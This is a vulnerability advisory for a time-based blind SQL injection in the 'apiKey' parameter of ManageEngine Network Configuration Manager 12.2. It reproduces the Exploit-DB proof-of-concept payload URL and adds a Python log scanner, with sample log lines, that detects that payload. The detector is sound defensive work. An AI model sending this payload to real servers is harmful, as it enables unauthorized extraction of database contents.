Vendor: Network Configuration Manager
By: AmirHadi Yazdani
CVSS: 8.8 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Network Configuration Manager
Affected Version From: <= Build Version : 12.2
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:manageengine:network_configuration_manager:12.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 2012 R2
2019

ManageEngine Network Configuration Manager 12.2 – ‘apiKey’ SQL Injection

ManageEngine Network Configuration Manager (NCM) is vulnerable to time-based blind SQL injection in the 'apiKey' parameter of the 'getOverviewList' API endpoint. An attacker can send a specially crafted HTTP request carrying a malicious payload in that parameter to the vulnerable endpoint and use it to extract information from the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of ManageEngine Network Configuration Manager.

Exploit-DB raw data:

# Exploit Title: ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection
# discovery Date: 2019-01-24
# published : 2020-01-20
# Exploit Author: AmirHadi Yazdani
# Vendor Homepage: https://www.manageengine.com/network-configuration-manager/
# Software Link: https://www.manageengine.com/network-configuration-manager/
# Demo: http://demo.networkconfigurationmanager.com
# Version: <= Build Version  : 12.2
# Tested on: win 2012 R2
------------
About ManageEngine Network Configuration Manager (NCM) (From Vendor Site):

Network Configuration Manager is a multi vendor network change,
configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices.
NCM helps automate and take total control of the entire life cycle of device configuration management.
--------------------------------------------------------

Exploit POC :

# Parameter: apiKey (GET)
# Title: PostgreSQL Time Based Blind
# Vector: AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))

#Payload:  
http://127.0.0.1/api/json/dashboard/getOverviewList?apiKey=1 AND 1398=(SELECT COUNT(*) FROM GENERATE_SERIES(1,3000000))&TimeFrame=hourly&_=1483732552930

--------------------------
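
A defensive check for the request pattern in the PoC above, added here as an example and not part of the original advisory or the vendor's code: it scans web access-log lines for getOverviewList requests whose apiKey is not a plain token and labels the GENERATE_SERIES delay vector. The log lines are constructed, and the alphanumeric key format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/api/json/dashboard/getOverviewList"
# Assumption: a legitimate apiKey is one alphanumeric token (format not given on the page).
API_KEY_OK = re.compile(r"[A-Za-z0-9]{1,64}")
# Heavy-query delay primitive named in the advisory's vector.
HEAVY_QUERY = re.compile(r"generate_series\s*\(", re.I)
SQL_SYNTAX = re.compile(r"\b(select|union|and|or)\b|[()=;']|--", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (?P<target>.+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [20/Jan/2020:10:00:00 +0000] "GET /api/json/dashboard/'
    'getOverviewList?apiKey=6f1a2b3c4d5e6f708192a3b4c5d6e7f8&TimeFrame=hourly HTTP/1.1" 200 512',
    '192.0.2.66 - - [20/Jan/2020:10:00:07 +0000] "GET /api/json/dashboard/'
    'getOverviewList?apiKey=1%20AND%201398=(SELECT%20COUNT(*)%20FROM%20'
    'GENERATE_SERIES(1,3000000))&TimeFrame=hourly&_=1483732552930 HTTP/1.1" 200 512',
    '192.0.2.66 - - [20/Jan/2020:10:00:09 +0000] "GET /api/json/dashboard/'
    'getOverviewList?apiKey=abc%27&TimeFrame=hourly HTTP/1.1" 500 120',
]

def classify_api_key(value):
    """Return 'ok' or the reason the decoded apiKey value is suspicious."""
    if API_KEY_OK.fullmatch(value):
        return "ok"
    if HEAVY_QUERY.search(value):
        return "time-based-sqli"
    if SQL_SYNTAX.search(value):
        return "sql-syntax"
    return "malformed"

def scan(lines):
    """Return (line_number, verdict, decoded_apiKey) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if url.path != ENDPOINT:
            continue
        # parse_qs URL-decodes, so %20 and + variants are compared in one form.
        for value in parse_qs(url.query, keep_blank_values=True).get("apiKey", []):
            verdict = classify_api_key(value)
            if verdict != "ok":
                findings.append((number, verdict, value))
    return findings
```

On a patched build the same check remains useful as an alert on probing, since the allow-list flags any apiKey that is not a plain token regardless of the SQL it carries.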